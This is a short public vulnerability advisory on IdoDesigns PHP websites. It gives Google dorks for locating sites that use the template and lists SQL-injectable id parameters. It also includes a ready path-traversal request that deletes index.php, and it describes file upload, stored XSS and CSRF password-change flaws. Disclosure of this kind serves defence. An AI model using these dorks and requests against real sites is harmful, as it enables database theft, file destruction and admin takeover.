IdoDesigns - Multiple Vulnerabilities

2025.03.05
Credit: bRpsd
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title > IdoDesigns - Multiple Vulnerabilities .:. Google Dorks .:. "Design by www.idodesigns.in" "Web Design by : www.idodesigns.in" "Design by : I DO Designs" You may use the dorks followed by inurl:?id= like ["Design by : I DO Designs" inurl:?id=] .:. Date: March 05,2025 .:. Exploit Author: bRpsd .:. Contact: cy[at]live.no .:. Vendor -> https://www.idodesigns.in/ .:. Product Version -> 1.0 .:. DBMS -> MySQL .:. Tested on > macOS [*nix Darwin Kernel], on local xampp @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Most PHP pages failed to secure parameters from SQLi resulting in Unauthorised SQL Injection with some using Base64 to help secure it but its insufficient, examples: /blog-details.php?id= /services-details.php?id= /gallery-more.php?id= /award-details.php?id= /program-details.php?id= /project-details.php?id= /photos.php?id= Admin Page [Authenticated] Multiple Exploits 1- Authenticated Arbitrary File Deletion: Parameter -> image GET https://site/ADMIN PAGE/blogAdd.php?delete_image=&img_id=1&id=3&image=../../../index.php 2- Authenticated Arbitrary File Upload: POST https://site/ADMIN PAGE/blogAdd.php?edit=1&id=3 Parameter -> images[] 3- Stored XSS: Most [POST] requests to edit pages or posts or users have vulnerable parameters that store XSS which can result in website defacement 4- CSRF is possible to update admin password File: /site/admin page/changePassword.php parameters & data: new_pwd=x&confirm_pwd=x&submit=


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top